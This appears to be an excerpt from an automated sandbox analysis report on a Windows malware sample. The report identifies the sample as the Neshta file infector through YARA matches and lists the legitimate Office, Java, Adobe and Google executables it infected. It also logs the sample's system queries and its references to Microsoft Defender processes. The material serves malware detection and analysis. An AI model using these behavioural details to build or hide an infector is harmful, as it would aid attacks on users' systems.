                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF60A4 cpuid 1_2_00DF60A4
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040F270 GetLocalTime,0_2_0040F270
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: 0_2_0040D815 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,0_2_0040D815
                          Source: $RUX313H.exe, 00000000.00000003.883707805.00000000020C4000.00000004.00000001.sdmp, svchost.com, 00000002.00000003.906541565.0000000002154000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
                          Source: $RUX313H.exe, 00000000.00000003.883707805.00000000020C4000.00000004.00000001.sdmp, svchost.com, 00000002.00000003.906541565.0000000002154000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected NeshtaShow sources
                          Source: Yara matchFile source: $RUX313H.exe, type: SAMPLE
                          Source: Yara matchFile source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
